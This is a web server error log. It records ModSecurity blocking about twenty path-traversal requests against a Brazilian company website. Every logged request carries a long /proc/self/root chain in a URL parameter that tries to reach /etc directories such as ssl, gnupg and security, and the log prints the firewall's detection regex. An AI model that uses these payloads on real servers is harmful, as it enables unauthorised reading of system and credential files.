[Fri Mar 20 06:34:12.475780 2026] [:error] [pid 10189:tid 140411582465792] [client 74.7.241.31:53530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UlDJ3M9BSuKP7CAYGMwAAAJM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:13.815037 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:53534] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UlfXLqtnMIWvjpaKJGwAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:34:14.949253 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.241.31:53542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ulta6ubjKNq_cu4bBdAAAA1A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:27.303494 2026] [:error] [pid 31215:tid 140411691570944] [client 74.7.241.31:53550] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UowF0L0L-SsrnPo5WbQAAAsY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:31.720278 2026] [:error] [pid 10189:tid 140411607643904] [client 74.7.241.31:41404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UpzJ3M9BSuKP7CAYGXQAAAJA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:45.119060 2026] [:error] [pid 11167:tid 140411716749056] [client 74.7.243.128:58436] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UtfHIg5MgXLBnicPoWAAAAcM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:46.487604 2026] [:error] [pid 21219:tid 140411666392832] [client 74.7.243.128:55980] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UtvXLqtnMIWvjpaKJNAAAAok"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:46.903467 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:41406] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UtuoXxyEfFpUF8f9w0QAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:50.055774 2026] [:error] [pid 9818:tid 140411548894976] [client 74.7.243.128:55996] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Uul1pVZ5mVmJwsFMezwAAAFc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:34:51.411643 2026] [:error] [pid 9818:tid 140411574073088] [client 74.7.243.128:44848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Uu11pVZ5mVmJwsFMe0AAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:54.701231 2026] [:error] [pid 11642:tid 140411557287680] [client 74.7.241.31:41642] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Uvrninkcc-iUj5ApNjQAAA5Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:34:55.757547 2026] [:error] [pid 31215:tid 140411607643904] [client 74.7.243.128:44864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UvwF0L0L-SsrnPo5WhQAAAtA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:34:58.743092 2026] [:error] [pid 7893:tid 140411708356352] [client 74.7.241.31:41652] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UwhCii7xarUs8iHZXLQAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:35:00.127993 2026] [:error] [pid 10189:tid 140411666392832] [client 74.7.241.31:34244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UxDJ3M9BSuKP7CAYGigAAAIk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:35:01.695617 2026] [:error] [pid 10189:tid 140411708356352] [client 74.7.241.31:34258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0UxTJ3M9BSuKP7CAYGjwAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:35:03.215008 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:44878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Ux_qxLDW4GITHUkTT3QAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:35:12.875352 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:44878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0U0PqxLDW4GITHUkTT6wAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:35:19.796514 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:34264] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0U1_XLqtnMIWvjpaKJUQAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 06:35:23.752639 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:58002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0U2xCii7xarUs8iHZXQwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:35:49.683016 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:59858] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0U9da6ubjKNq_cu4bB2AAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:36:01.623317 2026] [:error] [pid 11642:tid 140411716749056] [client 74.7.243.128:49112] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0VAbninkcc-iUj5ApNqAAAA4M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
